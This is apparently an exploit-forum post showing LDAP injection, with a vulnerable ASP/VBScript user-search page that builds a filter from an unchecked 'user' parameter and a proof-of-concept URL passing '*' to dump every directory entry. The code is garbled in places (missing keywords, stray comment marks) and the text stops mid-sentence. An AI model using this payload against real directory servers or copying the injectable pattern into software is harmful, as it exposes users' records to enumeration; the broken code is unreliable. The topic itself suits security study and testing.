[+] Vurnerebility: LDAP Injection [+] Category : Implemented Web exploit [+] Category : Attack Technique [+] Author : mc2_s3lector [+] dork : X/o\" [+] Contact : www.yogyacarderlink.web.id [+] date : 4-2-10 [+] biGthank to : Allah SWT,jasakom,KeDai Computerworks,0n3-d4y n3ro,eplaciano, all*.indonesian like a coding, --------------------------------------------------------------------------------------------------------------------------------------------------- Directory acces protokol/directory manipulation,protokol breaker->standar protocol,query custom statement,page request,componen execute command,data base server,web apps services modify,remove etc. --------------------------------------------------------------------------------------------------------------------------------------------------- code: <%@ Language=VBScript %> <% Dim userName Dim filter Dim ldapObj Const LDAP_SERVER = "ldap.example" userName = Request.QueryString("user")<-----------*1(LOOK THIS BUG LINE PARAMETER USER=EMPTY) ( userName = "" ) then Response.Write("Invalid request. Please specify a valid user name
") Response.End() end if filter= "(uid=" + CStr(userName) + //((*1)) userName used to initialize filter variable on this line direct query LDAP call to finf filter on ((*.3)) ")" ' searching for the user entry 'Creat LDAP object and setting the base dn Set ldapObj = Server.CreateObject("IPWorksASP.LDAP") ldapObj.ServerName = LDAP_SERVER ldapObj.DN = "ou=people,dc=spilab,dc=com" 'Setting the search filter ldapObj.SearchFilter = ((*.3))filter<---call SearchFilter on this line ldapObj.Search 'Showing the user ennumeratin info While ldapObj.result = ((1*.4 to *.5)) Response.Write("

") Write("User information for : " + ldapObj.AttrValue(0) + "
") For i = 0 To ldapObj.AttrCount -1 Response.Write("" + ldapObj.AttrType(i) + " : " + ldapObj.AttrValue(i) + "
" ) Response.Write("

") Wend ((*.5)) %> --------------------------------------------------------------------------------------------------------------------------------------------------- control over LDAP to querry =server LDAP & get query result from ((*.4 to *.5)) POC: http://server/ldapsearch.asp?user=* <----send the * character in the parameter user,result flter variable in code to be initialized with (uid=*). The resulting LDAP statement will make the server return -------------------------------------------------------------------------------------------------------------------------------------------------